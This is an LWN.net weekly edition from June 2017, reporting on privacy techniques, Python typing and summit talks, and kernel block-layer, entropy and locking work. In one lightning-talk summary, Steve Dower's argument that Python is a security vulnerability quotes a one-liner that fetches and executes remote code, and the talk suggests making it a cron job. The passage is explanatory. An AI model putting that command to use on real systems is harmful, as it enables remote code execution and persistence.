LWN.net Weekly Edition for June 8, 2017 [LWN.net]

Welcome to the LWN.net Weekly Edition for June 8, 2017

This edition contains the following feature content:

Guarding personally identifiable information: a report on a talk from the Strata conference on ways to protect personally identifiable information.
Classes and types in the Python typing module: should types be classes in typing?
Status of mypy and type checking: an update on the mypy static type checker and some additions to the typing module.
Language summit lightning talks: a grab bag of mostly short topics from the Python Language summit.
Improved block-layer error handling: better ways for the kernel to communicate failures in the block layer.
Waiting for entropy: a proposal to add an in-kernel mechanism to wait for sufficient entropy in the random number pool.
Range reader/writer locks for the kernel: a possible way forward for the longstanding need of a way to lock only a portion of a resource in the kernel.

This week's edition also includes these inner pages:

Brief items: Brief news items from throughout the community.
Announcements: Newsletters, conferences, security updates, patches, and more.

Please enjoy this week's edition, and, as always, thank you for supporting LWN.net.

Comments (6 posted)

Guarding personally identifiable information

June 7, 2017

This article was contributed by Andy Oram

There is no viable way to prevent data from being collected about us in the current age of computing. But if institutions insist on knowing our financial status, purchasing habits, health information, political preferences, and so on, they have a responsibility to keep this data—known as personally identifiable information (PII)—from leaking to unauthorized recipients. At the 2017 Strata data conference in London, Steve Touw presented a session on privacy-enhancing technologies. In a fast-paced 40 minutes he covered the EU regulations about privacy, the most popular technical measures used to protect PII, and some pointed opinions about what works and what should be thrown into the dustbin.

To jump straight to Touw's conclusions: we need to maintain much tighter control over data that we share. Like most who have studied the question of PII, Touw finds flaws in current forms of de-identification, which is the technique we rely on most often for protecting PII. He suggests combining de-identification techniques with a combination of restrictions on the frequency and types of queries executed against data sets, along with a context-based approach to data protection that is much more sophisticated than current access controls.

No one would have enough time to explain thoroughly all the issues in protecting PII. Touw focused on European legal requirements (which made sense for a conference held in London), technical difficulties in de-identifying data, and good organizational practices for protecting privacy. This article fills out some of the background underlying these issues as well.

Common constraints on data collection

Although people viscerally fear the collection of personal data, and alternatives such as Vendor Relationship Management have been suggested for leaving control over data in the hands of the individual, there are few barriers in the way of organizations that collect this data. The EU has regulated data collection for decades, and its General Data Protection Regulation (GDPR), which is supposed to come into force on May 25, 2018, requires limitations that are familiar to those in the privacy field. These include minimization, data retention limits, and restrictions on use to the original purpose for collecting the data. I'll offer a brief overview of these key concepts.

Minimization means collecting as little data as you can to meet your purpose. If you need to know whether someone is old enough to drive, you can record that as a binary field without recording the person's age. If you need to know how many cars pass down a street each day in order to plan traffic flow, you don't need to record the license plates of the cars.

Data retention limits are a form of minimization. Most data's value diminishes greatly after a few months. For instance, a person's income may change, so income information collected a year ago may no longer be useful for marketing. Therefore, without much of a sacrifice in accuracy, an organization can protect privacy by discarding data after a certain time interval.

Restricting use to the original purpose of data collection is an even stricter criterion. Supposedly it would mean that a retailer who collects your information in order to charge your credit card should not use that information to improve its marketing campaigns.

Governments in the US impose restrictions only on specific classes of information, such as data collected by health care providers. Fair Information Practices, which cover some broad issues such as transparency and the right to correct errors, are widely praised but not required by law. They also go nowhere near as far as EU laws in granting rights to individuals for their data.

Although the GDPR does not require organizations to obtain consent for data collection, Touw advised them always to do so. Otherwise, the organizations may be asked to demonstrate in court that they had a "legitimate interest" in the data, which is a subjective judgment. Touw did not go into the problems of consent forms, so his advice was really aimed at protecting the company doing the collection, not the individuals.

The dilemma of data sharing

Protection of personal data takes place on two levels: while storing it at the site collecting the data, and while granting access to other parties. Why would sites offer data to other parties? Touw did not cover this question, but there are a few reasons behind that practice.

Organizations can realize a large income stream from selling the data, which can then be used for purposes ranging from benign to ill. Governments collect and share data that is supposed to be for the public benefit (e.g. race and gender, incidences of communicable diseases). Public agencies, and even some companies, believe their data could contribute to initiatives in health, anti-corruption efforts, and other areas. Some institutions also anticipate that they might benefit from tools developed by others. Thus, Netflix released data on who viewed its video content for the Netflix prize of 2009, hoping to get a better algorithm for video recommendations from experts in the field.

When data is shared publicly, the organization tries to strip direct identifiers, such as names and social security numbers, and tries to reduce the risk that indirect identifiers such as postal codes can be used to re-identify individuals. Even when organizations sell their data privately, they often try to de-identify it in similar ways. The GDPR gives organizations pretty much free rein to use and release data, so long as it is correctly de-identified.

Problems with de-identification

The bulk of Touw's talk was devoted to the risks of de-identification, also known as anonymization. His skepticism about de-identification is shared by most experts in computing who have examined the field. In particular, he looked at techniques for pseudonymity and K-anonymity, claiming that they can't prevent re-identification unless they're pursued so far that they render the output data useless.

Touw predicted that organizations will stop releasing free, de-identified data sets, because de-identification has too often proven insufficient and too many embarrassing breaches have been publicized. Besides the Netflix prize mentioned earlier, where researchers re-identified Netflix users from the data [PDF], Touw mentioned some other open data sets and spent a good deal of time on New York City taxi data.

All these re-identification attacks depended on the mosaic effect, or finding other publicly available sources and joining them with the released data set. (Touw called this a "link attack.") In the case of the New York taxi data, most of us would have nothing to fear, but celebrities who are sighted at the beginning or end of their rides could potentially be re-identified. Touw claimed that New York City could not have prevented the re-identification by fuzzing or removing fields from the data, a point also made by the researcher who originally performed the re-identification attack. I believe Touw moved the goalposts a bit by adding new sources of information to fuel possible attacks as he removed existing information. Still, he made a case that the only way to protect celebrities would be to remove everything of value from the data.

Pseudonymization is the easiest way to de-identify data. It consists of putting a meaningless value in place of a personally identifying field. People may still be re-identified, though, if they possess unique values for other fields. For instance, if someone is the only Hispanic person in a particular apartment building, a combination of race and address can identify them. If someone suffers from a rare disease, a hospital listing with diagnoses may reveal sensitive information to someone who knows they have that disease.

K-anonymity addresses the problem of unique values, known also as high cardinality values. The technique makes sure there are enough duplicate values in different rows of data so that no individual is identified by a particular combination of fields. K-anonymity works by making values in fields more general: a common example is offering just the first three digits of a five-digit ZIP code. Because the digits are hierarchical (the code 200 is a single contiguous geographic area that contains 20001, 20002, etc.), generalizing the ZIP code exposes data that is still useful but is less specific.

Touw briefly mentioned two enhancements to K-anonymity, known as L-diversity and T-closeness, that are more restrictive. L-diversity [PDF] restricts the number of unique values in information by taking into account the probability that an attacker can guess something about the target (such as their address). T-closeness [PDF] tries to prevent re-identification by making sure that each division in the data (such as ZIP code) contains sensitive values with about the same frequency as the general population. Touw claimed L-diversity and T-closeness are more trouble than they're worth, and that all these techniques leave people at risk of re-identification unless the data is generalized to the point where it's worthless.

When you listen to data scientists like Touw who have investigated the limitations of anonymization, you come away feeling that there's no point to doing it. But let's step back and consider whether this is a constructive conclusion. Nearly all published examples of re-identification took advantage of poor de-identification techniques. Done right, according to proponents, de-identification is still safe. On the other hand, it's easy for proponents of de-identification to say that a technique was flawed after the fact.

To resolve the dilemma, one can look at de-identification like encryption. We can be fairly certain that, within a few decades, increased computing power and new algorithms will allow attackers to break our encryption. We keep increasing key sizes over the decades to compensate for this certainty. And yet we keep using encryption, because nothing better exists. De-identification is still worth using too. But Touw has some alternative ways to carry it out.

Proposed remedies

In addition to advising that organizations obtain consent for data collection, Touw offered two practices that are more effective than the previous methods of data protection: restricting data requests to a safe set of queries and using context-based restrictions. Neither practice is in common use now, but models exist for their use.

If an organization does not release data in the open, it can achieve some of the organizational and social benefits of open data by offering a limited set of queries to third parties. Touw promoted the concept of differential privacy, which is a complex technology understood by relatively few data experts. The concept has been attributed [PDF] to Cynthia Dwork, who co-authored a key paper [PDF] laying out the theory. She explains differential privacy there (on page 6) by saying, "it ensures that any sequence of outputs (responses to queries) is 'essentially' equally likely to occur, independent of the presence or absence of any individual." It never reveals any specific fields in the underlying data, but provides a set of aggregate queries—such as sums or averages—that mathematical analysis of the data set have shown to be privacy-preserving.

Touw demonstrated how a specific value for a specific person might be obtained by asking the same question—or to disguise the attack, many questions that differ slightly—over and over. Each question produces a slightly different result in the field you're interested in, but if you take the average of these results you can get very close to the original value. So some form of rate-limiting must be imposed on queries.

Touw's other major recommendation involves context-based or purpose-based restrictions, which he called "the future of privacy controls". They go far beyond individual or group access controls used by most sites.

One example of context-based restrictions is time-based access. A conventional employer might allow access by its employees from 9:00 AM to 5:00 PM. In a more flexible environment, such as a hospital where nurses' shifts have irregular beginnings and ends, the hospital may allow each nurse access to data when their schedule indicates they are on duty.

Another type of context-based restriction is based on granting users limited access to data based on a license that spells out what they want to do (say, cancer research) and how they can use data. If the user starts issuing requests for certain combinations of rows or columns that don't seem to fulfill the basis for which the license was granted, access can be denied.

Touw advises organizations not to try to combine all their data in a single data lake—or worse still, to copy data into a new repository in order to perform access controls. Maintaining two copies of data is always cumbersome and error-prone. In addition, you now offer attackers twice the opportunities to break into the data. Instead, he suggests an organizational set up what he calls a "data control plane". It implements all the policies defined by the organization and covers all data stores. The control plane should expose easy ways to create rules, make sure new policies take effect immediately, recognize the types of context mentioned earlier, and maintain audits that show what the data was used for. Organizations must also exercise governance over data so they know who owns it, who has access to it and under what circumstances, and how to manage the data's lifecycle (acquiring, storing, selling, purging). They can't just rely on the IT department to define and implement policies.

Few if any commercial vendors offer the advanced privacy-protecting technologies recommended by Touw. So at this point, attackers run ahead of most organizations that maintain data on us. Still, Touw's talk opens up a valuable debate about what real privacy protection looks like in 2017.

Comments (45 posted)

Classes and types in the Python typing module

By Jake Edge
June 7, 2017

Python Language Summit

Mark Shannon is concerned that the Python core developers may be replaying a mistake: treating two distinct things as being the same. Treating byte strings and Unicode text-strings interchangeably is part of what led to Python 3, so he would rather not see that happen again with types and classes. The Python typing module, which is meant to support type hints, currently implements types as classes. That leads to several kinds of problems, as Shannon described in his session at the 2017 Python Language Summit.

He wanted to convince people that the typing module is "heading in the wrong direction". He is not opposed to type hints or variable annotations, but is concerned that the typing module is conflating types and classes in a way that is detrimental. Classes are for object-oriented programming, while types declare what something is. A class can be a subclass of another without being a subtype of it. List[int] and List[float] (lists of integers and floating point numbers, respectively) are distinct types, he said, but are both implemented by the list class. In the current typing module, types are implemented as classes.

This has happened before, with bytes and Unicode in the Python 2 days, Shannon said. He would rather see this get addressed now, before the core developers (and the language) get to that point again.

Practical problems

Using classes for types has some concrete negative effects. Classes are "large and bad" in CPython, but are much worse for MicroPython. A namedtuple-based implementation of List[int] is around 1/60 the size of the class-based one.

There are also some oddities. He showed two class definitions:

    class MyList(Sequence[int], list): pass

    class MyList(list, Sequence[int]): pass

In both cases, MyList inherits from builtins.list and the sequence of integers type (Sequence[int]), but a simple append operation on an instance of one of them is 10% faster than on an instance of the other.

It turns out that the method resolution order (MRO) comes into play. MRO determines which method actually gets called when multiple inheritance is used; Python tracks that on the __mro__ attribute. For a class that inherits builtins.list, the MRO has three items, but for List[int] it has 17.

Types and type constructors are already hard enough to understand, he said. Turning them into classes and metaclasses just makes that worse. In addition, since types in typing already have a custom metaclass, it makes it difficult to define a type for a class that has its own custom metaclass.

When adopting type hints, the core developers made a few promises, Shannon said. Type hints would allow programs to be checked for type errors, they would always be optional, and using them should not slow your program down. The first two of those have been kept, but the last has not. Every time you run a program with type hints, it pulls in large chunk of code that slows things down.

Options

He presented three options. The first was to continue using types as classes, but to painfully check that an instance of Iterable(int) actually produces integers for each entry. Then hope that things don't get as bad as they did for bytes and Unicode. Another was "the status quo"; much the same as the first, but to ignore the checks that seem expensive. The option that he prefers is to keep types and classes distinct, which will remove the "conceptual muddle" and reduce the run-time overhead of using types. He has a minimal prototype implementation on GitHub to demonstrate what he means.

Attendees were generally supportive of his ideas; Guido van Rossum filed a bug for typing on some of the issues he raised. There were also suggestions on ways to reduce the overhead for code that uses type hints. Łukasz Langa noted that Instagram had reduced the size of compiled Python (i.e. bytecode) by 1.5% just by removing the docstrings; perhaps something similar could be done to remove the type annotations to reduce the size of the code.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Comments (none posted)

Status of mypy and type checking

By Jake Edge
June 7, 2017

Python Language Summit

In his 2017 Python Language Summit session, Jukka Lehtosalo updated attendees on the status of type checking for the language, in general, and for the mypy static type checker. There are new features in the typing module and in mypy, as well as work in progress and planned features for both. For a feature, type hints, that is really only around three years old, there has been a lot of progress made—but, of course, there is still more to come.

The most significant new thing for types in Python is the adoption of PEP 526, which adds a way to annotate variables with their types. As of Python 3.6, variable annotations can be used for regular variables, instance variables, and class variables. The latter is made possible with the ClassVar[] annotation that has been added to typing. Other additions include NewType() for creating distinct types and NoReturn for functions that do not return.

Some recent mypy features include function overloads in source files (and not just stub files) and basic metaclass support, but there is still work to be done on the latter. There is also a new "quick mode" that is up to ten times faster. Quick mode is an incremental check; it just looks at the file itself and assumes that what it imports does not need to be checked.

There are also some experimental mypy features that Lehtosalo mentioned. The mypy_extensions module contains various extensions to typing that are being tried out. Some of those may get promoted to typing if they work out. One of those is the more flexible Callable[] type, which has a syntax that is "not pretty" but works. More information about these and other features can be found in his mypy 0.510 release announcement.

There are also some features in progress for mypy, he said. The TypedDict type, which will allow dictionaries that specify the types of values for specific keys, is one. Another is support for structural subtyping using Protocols. There are some planned improvements for type variables, including adding support for variadic type variables and for variables that describe function argument specifications. Decorators sometimes change a function's signature, so support for declaring the decorated type of a function is planned as well.

Mypy is starting to be used in production. At Dropbox, where Lehtosalo works, 700,000 lines of code have been annotated and are being checked with mypy. The Zulip project has 95,000 lines of code annotated; Facebook, Quora, and others are using the tool as well. There has been quite a bit of positive user feedback, he said. Performance is still an issue, however; a full run at Dropbox takes around two minutes, which is "barely acceptable". But a large scale roll-out at Dropbox is under way.

There were some lessons learned along the way. To start with, changing type systems is "very expensive" and causes a fair amount of pain for users. That means Dropbox may become stuck with some early choices it made before some features had been added to typing and mypy. Having the typing module in the standard library has turned out to be annoying, because there are new features in the 3.6 release that can't be used in 3.5, which is the version used by Dropbox. typing is moving fast, so sometimes it makes sense to backport features into earlier versions, he said.

There are a lot of contributors to the projects (both typing and mypy), especially for typeshed, which collects annotations for Python built-ins and the standard library. The two other major type checkers, pytype and PyCharm, also contribute, so there is a real community building up around type annotations.

Mark Shannon asked when the project would decide to stop adding features for ever-more-obscure type constructs; "at what point do you say 'just use Any'?" Lehtosalo said that the project tends to consider constructs that have multiple users and uses throughout the ecosystem and is not interested in adding support for lots of one-off corner cases.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Comments (none posted)

Language summit lightning talks

By Jake Edge
June 7, 2017

Python Language Summit

Over the course of the day, the 2017 Python Language Summit hosted a handful of lightning talks, several of which were worked into the dynamic schedule when an opportunity presented itself. They ranged from the traditional "less than five minutes" format to some that strayed well outside of that time frame—some generated a fair amount of discussion as well. Topics were all over the map: board elections, beta releases, Python as a security vulnerability, Jython, and more.

MicroPython versus CPython

The first entry here was not actually billed as a lightning talk, but it fits the model pretty well. Mark Shannon briefly described some of the differences between MicroPython and the CPython reference implementation right after lunch. MicroPython is an implementation of the language that targets microcontroller hardware; LWN looked at it running on the pyboard development hardware back in 2015.

Larry Hastings introduced the session by noting that MicroPython is the first competing implementation that has Python 3 support. Shannon held up a BBC micro:bit board, which runs MicroPython and has been given to students in the UK, and noted that it only has 16KB of memory. He asked how many attendees had 16GB in their laptops and got a few hands.

MicroPython is a severely memory-constrained version of Python 3, but it does come with most of the standard library. In fact, it has asyncio support, for example. It is not CPython, but is a completely new implementation of the language. The micro:bit has 256KB of flash memory and MicroPython runs from the flash. Most of the data is immutable and lives in flash as well. Hastings noted that MicroPython has a tracing garbage collector, rather than using reference counting as CPython does.

Michael Foord spoke up to extol the micro:bit device, which costs around $20. It is "easy to play with" and has almost all of the features of Python, including the dynamic features. There is a book coming out in June about it. Overall, "it is a great, fun thing to experiment with."

PSF board

In the first real lightning talk, Hastings had a suggestion for the assembled core developers: run for the Python Software Foundation (PSF) board of directors. He noted that the 2006-2007 board was dominated by core developers (seven out of eight), while the 2016-2017 board has a single core developer (Kushal Das).

He said that he thought it would be "lovely to see more core developers" on the board, so he asked those present to nominate themselves (or other core developers) by the May 25 deadline, which was one week away when he gave the talk. When Hastings was asked if he would be running, though, he said "I don't have time for that" with a bit of a grin. In the end, the board nominations have closed; there are two core developers (Das and Thomas Wouters) on the list, which has 22 entries for 11 seats.

Why beta?

Łukasz Langa questioned the value of the beta phase for Python releases in his lightning talk. He asked: "did your company use the beta of 3.6?" The beta period is nearly five months long and is meant to "surface issues" in the code, but he is not really sure that is happening. So he is concerned that the project is not using that time well.

Furthermore: "what is the point of the 3.6.x point releases?" He wondered if a stable branch would better serve the community. But many attendees responded that the point releases were valuable and that an always-stable branch would not suit their needs.

Where Langa works, at Facebook, the point releases have not been all that helpful; they introduce regressions and "some are pretty bad". His perspective may be somewhat skewed, however, since his code base is heavily dependent on the asyncio and typing modules. But, by running his tests on code from the 3.6 branch, he was able to find a bug that was introduced after 3.6.0 and get it fixed before 3.6.1 was released.

He suggested that more people start testing before the releases are made. He has already been doing some testing on the 3.7 branch, for example. He noted that Brett Cannon has a blog post about doing that. Core developers should also be aware that there are some people out there testing what is getting committed to stable, and even development, branches.

Barry Warsaw noted that Linux distributions use the betas and release candidates as they prepare for their releases. Ned Deily said that getting "more eyes on daily builds" would be great, but the point releases are important because of all the different platforms that need to be supported. But Langa is not advocating getting rid of the point releases; since there are no betas for point releases, he wants to see more testing before the release. But point releases are only for bug fixes, Deily said, not for new features. Langa is concerned that point releases also introduce regressions, however.

The beta release provides an important psychological barrier for developers, Guido van Rossum said, it is not meant for customers. Another attendee pointed out that the release candidate(s) for point releases are effectively the betas for those releases. But there is little testing of betas or release candidates, Langa said; there are always small things that are wrong and clearly have not been tested.

Beta releases do provide a platform for third-party developers, though, Deily said. Libraries and modules can test with them to ensure their code will work with the upcoming release. Python upstream does make that available, Langa said, but the external world is not really using it. The alternative is for the Python project to do more of that testing itself, Deily said.

Stable branches open up another pitfall, though, an attendee said. For example, at one point NumPy added a feature in its Git repository that needed to be changed fairly soon afterward. Unfortunately, SciPy had committed its own change based on that code, so NumPy had to carry backward compatibility hacks for a feature that was never intended to be stable. Once something has been committed to a stable branch in Git, people assume that it is completely baked; "if it breaks later, it is our problem".

Another attendee suggested that other projects are not likely to test with a beta release, but might with a release candidate. That led Hastings to jokingly suggest that Python "just cross out the word beta and replace it with rc [release candidate]". "In crayon", Warsaw added with a grin.

Ordered dictionaries

CPython 3.6 changed its dictionary implementation to one that is more compact, so it uses less memory, but that also preserves the order that keys are inserted. That resolves PEP 468, which is about preserving the order of keyword arguments in the dictionary passed to functions, but it may have an unintended side effect as well. Gregory P. Smith wanted to discuss that in his lightning talk.

Smith is concerned that Python code will start to rely on the fact that dictionary insertion order is preserved, which is, for now, simply a CPython implementation decision. Other Python implementations may make other choices, so some code could break unexpectedly. He wondered if a change should be made for Python 3.7.

In particular, he suggested that the iteration order for dictionaries could be changed slightly. Those that need ordering could use collections.OrderedDict explicitly. He said that the disordering does not need to be random, necessarily, though that would be fine, it just needs to change the order enough so that reliance on ordering would be picked up in testing.

He suggested that, for 3.7, either the ordering be broken or that Python declare that all dictionaries must be ordered. If the latter is done, would there be a need for an UnorderedDict, an attendee asked. Smith did not think there would be any users for that, but it could be done if needed. The issue is now on the core developers' radar, but no firm conclusion was reached in the talk.

Python as a security vulnerability

Steve Dower had a provocative title for his lightning talk: "Python is a Security Vulnerability". His point was that Python (and other, similarly powerful languages) installed on a system gives attackers a tool that can be easily used to further their aims. Normally, when we think of security vulnerabilities, we think of things like buffer overruns, but in some sense, the Python language and its libraries also qualify.

He said he often hears statements like "I love it when I find a system with Python installed ... it's basically already owned". Red teams and penetration testers love to find Python on systems they access, he said. As a thought experiment, he posited that if you could somehow get one shell command executed on a workstation inside the US National Security Agency (NSA), that command might well be something like:

    python -c "exec(urlopen(...).read())"

Adding it as a cron job would be even more effective.

So, what should be done about this? The Python core development community needs to acknowledge the problem; it is the reason that many corporate networks ban Python, for example. The community should also look for ways to change Python to make things better. Creating a locked-down version of the language and libraries to make it harder for attackers to abuse might be something to consider.

PyCharm update

A brief update on the PyCharm integrated development environment (IDE) for Python was up next. Dmitry Trofimov and Andrey Vlasovskikh noted that for the first time, Python 3 use was larger than that of Python 2 in PyCharm. Almost all of the Python 2 use is 2.7, while Python 3 has mostly 3.5 and 3.6 users, though there is a lingering contingent of 3.4 users.

The PyCharm debugger now supports the PEP 523 frame evaluation API. That has sped up the debugger by 20x; it started out as a 40x improvement, but that dropped to the current level when a subtle bug was fixed. It is a rare PEP that affects the debugger, they said; there should be more of those. The API should also be considered for backporting to 2.7, they said.

They also wanted to point out the new profiler for Python, VMProf (documentation here). It was developed by the PyPy project with cooperation from JetBrains, which is the company behind PyCharm. VMProf is a native profiler for Python that runs on macOS, Windows, and Linux.

Jython

The final lightning talk was given by Darjus Loktevic, who lamented the sad state of the Jython project, which is an implementation of Python for the Java virtual machine. Jython is still under development, he said, but it has a small team (2-5 active developers). The project is close to releasing Jython 2.7.1, which is more or less the same as CPython 2.7.11. It has a Jython Native Interface (JyNI) that can be used to run Python's C extensions (e.g. NumPy) in Jython.

But, he asked, is Jython still relevant today? The question came up in a Reddit thread recently, he said. The problem with Jython is that it is not Python enough to run things out of the box—tests fail, little bits and pieces are different or not supported. On the other hand, Jython is not Java enough either; it is not a great scripting language for Java and it is stuck on 2.7, which is not that great, he said.

The "killer features" for Jython are that it can call Java classes from Python code and that it lacks a global interpreter lock (GIL). Jython has had no GIL for a long time, but no one seems to care, Loktevic said. Maybe more would care if some of the other features were sorted out better.

Going forward, there will be an effort to make JyNI better, so that more C extensions can run. Also, the clamp project will allow Python code to be compiled into Java jar files so it can be directly imported into Java. Jython plans to move to GitHub and reuse the core workflow. His talk had to wind down rather abruptly at that point as the summit had run more than an hour late.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Comments (13 posted)

Improved block-layer error handling

By Jonathan Corbet
June 2, 2017

The kernel's filesystem and block layers are places where a lot of things can go wrong, often with unpleasant consequences. To make things worse, when things do go wrong, informing user space about the problem can be difficult as a consequence of how block I/O works. That can result in user-space applications being unaware of trouble at the I/O level, leading to lost data and enraged users. There are now two separate (and complementary) proposals under discussion that aim to improve how error reporting is handled in the block layer.

Block-layer error codes

One problem with existing reporting mechanisms is that they are based on standard Unix error codes, but those codes were never designed to handle the wide variety of things that can go wrong with block I/O. As a result, almost any type of error ends up being reported back to the higher levels of the block layer (and user space) as EIO (I/O error) with no further detail available. That makes it hard to determine, at both the filesystem and user-space levels, what the correct response to the error should be.

Christoph Hellwig is working to change that situation by adding a dedicated set of error codes to be used within the block layer. This patch set adds a new blk_status_t type to describe block-level errors. The specific error codes added thus far correspond mostly to the existing Unix codes. So BLK_STS_TIMEOUT, indicating an operation timeout, maps to ETIMEDOUT, while BLK_STS_NEXUS, describing a problem connecting to a remote storage device, becomes EBADE ("invalid exchange"). There is, according to Hellwig, "some low hanging fruit" that can be improved by additional error codes, but those codes are not added as part of this patch set.

The new errors can be generated at the lowest levels of the kernel's block drivers, and will be propagated to the point that filesystem code sees them in the results of its block I/O requests. To get there, the bi_error field in struct bio, which contained a Unix error code, has been renamed to bi_status. In-tree filesystems have been changed to use the new field, but they do not yet act on the additional information that may be available there.

This is, in other words, relatively early infrastructural work that makes it possible for the block layer to produce better error information. Actually making use of that infrastructure will have to wait until this work is accepted and headed toward the mainline.

Reporting writeback errors

One particular challenge for block I/O error reporting is that many I/O requests are not the direct result of a user-space operation. Most file data is buffered through the kernel's page cache, and there can be a significant delay between when an application writes data into the cache and when a writeback operation flushes that data to persistent storage. If something goes wrong during writeback, it can be hard to report that error back to user space since the operation that caused that writeback in the first place will have long since completed. The kernel makes an attempt to save the error and report it on a subsequent system call, but it is easy for that information to be lost with the result that the application is unaware that it has lost data.

Jeff Layton's writeback-error reporting patches are an attempt to improve this situation. He adds a mechanism that is based on the idea that applications that care about their data will occasionally call fsync() to ensure that said data has made it to persistent storage. Current kernels might report a writeback error on an fsync() call, but there are a number of ways in which that can fail to happen. With the new mechanism in place, any application that holds an open file descriptor will reliably get an error return on the first fsync() call that is made after a writeback error occurs.

To get there, the patch set creates a new type (errseq_t) for the reporting of writeback errors. It is a 32-bit value with two separate fields: an error code (of the standard Unix variety) and a sequence counter. That counter tracks the number of times that an error has been reported in that particular errseq_t value; kernel code can remember the counter value of the last error reported to user space. If the counter increases on a future check, a new error has been encountered.

The errseq_t variables are added to the address_space structure, which controls the mapping between pages in the page cache and those in persistent storage. The writeback process uses this structure to determine where dirty pages should be written to, so it is a logical place to store error information. Meanwhile, any open file descriptor referring to a given file will include a pointer to that address_space structure, so this errseq_t value is visible (within the kernel) to all processes accessing the file. Each open file (tracked by struct file) gains a new f_wb_err field to remember the sequence number of the last reported error.

Storing that value in the file structure has an important benefit: it makes it possible to report a writeback error exactly once to every process that calls fsync() on that file, regardless of when they make that call. In current kernels, only the first caller after an error occurs has a chance of seeing that error information. It would arguably be better to report the error only to the process that actually wrote the data that experienced the error, but tracking things at that level would be cumbersome and slow. By informing all processes, this mechanism ensures that the right process will get the news.

The final step is to get the low-level filesystem code to use the new reporting mechanism when something goes wrong. Rather than convert all filesystems at once, Layton chose to add a new filesystem-type flag (FS_WB_ERRSEQ) that can be set for filesystems that understand the new scheme. Code at the virtual filesystem layer can then react accordingly depending on whether the filesystem has been converted or not. The intent is to remove this flag and the associated mechanism once all in-tree filesystems have made the change.

The ideas behind this patch set were discussed at the 2017 Linux Storage, Filesystem, and Memory-Management Summit in March; the patches themselves have been through five public revisions since then. There is a reasonable chance that they are approaching a sort of final state where they can be considered for merging in an upcoming development cycle. The result will not be perfect writeback error reporting, but it should be significantly better than what the kernel offers now.

Comments (39 posted)

Waiting for entropy

By Jonathan Corbet
June 6, 2017

Many bytes have been expended over the years discussing the virtues of the kernel's random number generation subsystem. One of the biggest recurring concerns has to do with systems that are unable to obtain sufficient entropy during the boot process to meet early demands for random data. The latest discussion on this topic got off to a bit of a rough start, but it may lead to an incremental improvement in this area.

Jason Donenfeld started the thread with a complaint that /dev/urandom will, when read from user space, return data even if the kernel's internal entropy pool has not yet been properly seeded. In such a case, it is theoretically possible for an attacker to predict the not-so-random data that will be returned. He asserted that /dev/urandom should simply block until the entropy pool is ready, and dismissed the reasoning behind the current behavior: "Yes, yes, you have arguments for why you're keeping this pathological, but you're still wrong, and this api is still a bug."

Bug or not, as Ted Ts'o pointed out, making /dev/urandom block causes distributions like Ubuntu and OpenWrt to fail to boot. That sort of behavioral change is typically called a "regression", and regressions of this sort are not normally allowed. So /dev/urandom will retain its current behavior. But that isn't the point Donenfeld was really trying to address anyway. The real issue, as it turns out, has to do with getting random data from within the kernel instead of from user space. That can be done with a call to:

    void get_random_bytes(void *buf, int nbytes);

This function will place nbytes of random data into the buffer pointed to by buf; it will do so regardless of whether the entropy pool is fully initialized. So, once again, it is possible to get data that is not truly random. Since this function is called from inside the kernel, those calls can happen early in the boot process, so the chance of encountering an insufficiently random entropy pool are relatively high.

This problem is not unknown to the kernel development community, of course. In 2015, Stephan Mueller proposed the addition of a version of get_random_bytes() that would block until the entropy pool is ready, should that be necessary. That idea ran into trouble, though, when Herbert Xu pointed out that it could lead to deadlocks — just the sort of random event that tends not to be of interest. So, instead, a callback interface was created. Kernel code that wants to ensure that it gets good random data starts by creating a callback function and placing a pointer to that function in a random_ready_callback structure:

    struct random_ready_callback {
	struct list_head list;
	void (*func)(struct random_ready_callback *rdy);
	struct module *owner;
    };

That structure is then passed to add_random_ready_callback():

    int add_random_ready_callback(struct random_ready_callback *rdy);

When the random-number subsystem is ready, the given callback function will be called. By adding some more structure (most likely using a completion), the calling code can create something that looks like a synchronous function to get random data.

As Donenfeld pointed out, this interface is a little bit on the cumbersome side, which may have something to do with the fact that it has exactly one call site in the kernel. He suggested that it might make sense to add a synchronous interface that could be used in at least some situations; that would make it possible to fix some places in the kernel that are at risk of using nonrandom data. Ts'o agreed that this approach might make sense:

Or maybe we can then help figure out what percentage of the callsites can be fixed with a synchronous interface, and fix some number of them just to demonstrate that the synchronous interface does work well.

The end result was a patch series from Donenfeld adding a new function:

    int wait_for_random_bytes(bool is_interruptable, unsigned long timeout);

As its name might suggest, wait_for_random_bytes() will wait until random data is available. If is_interruptable is set, the function will return early (with an error code) should the calling process receive a signal. The timeout parameter can be used to put an upper bound on how long the call will wait. This functionality turned out to be a bit more than was needed, though; in particular, Ts'o expressed skepticism about the timeout idea, asking: "If you are using get_random_bytes() for security reasons, does the security reason go away after 15 seconds?" The third version of the patch set removed all of the arguments to wait_for_random_bytes(), making all waits interruptible with no timeout.

The patch series then adds a set of convenience functions to combine waiting and actually getting the random data, including:

    static inline int get_random_bytes_wait(void *buf, int nbytes);

Most of the comments on the patch set at this point are about relatively minor issues. So chances are that some version of this patch set will find its way into the kernel eventually, with the result, hopefully, that there will be a reduced chance of kernel code using insufficiently random data. But there is one other aspect of this situation that seems entirely deterministic: the arguments about the quality of the kernel's random-number subsystem are far from finished. That is, after all, the fundamental problem with random numbers: it is difficult to be sure that they are truly random.

Comments (39 posted)

Range reader/writer locks for the kernel

By Jonathan Corbet
June 5, 2017

The kernel uses a variety of lock types internally, but they all share one feature in common: they are a simple either/or proposition. When a lock is obtained for a resource, the entire resource is locked, even if exclusive access is only needed to a part of that resource. Many resources managed by the kernel are complex entities for which it may make sense to only lock a smaller part; files (consisting of a range of bytes) or a process's address space are examples of this type of resource. For years, kernel developers have talked about adding "range locks" — locks that would only apply to a portion of a given resource — as a way of increasing concurrency. Work has progressed in that area, and range locks may soon be added to the kernel's locking toolkit.

Jan Kara posted a range-locking mechanism in 2013, but that work stalled and never made it into the mainline. More recently, Davidlohr Bueso has picked up that work and extended it. The result is a new form of reader/writer lock — a lock, in other words, that distinguishes between read-only and write access to a resource. Reader/writer locks can increase concurrency in settings where the protected resource is normally accessed by readers, since all readers can run simultaneously. Whenever a writer comes along, though, it must have exclusive access to the resource. Balancing access between readers and writers can be a tricky business where the wrong decisions can lead to starvation, unfairness, or poor concurrency.

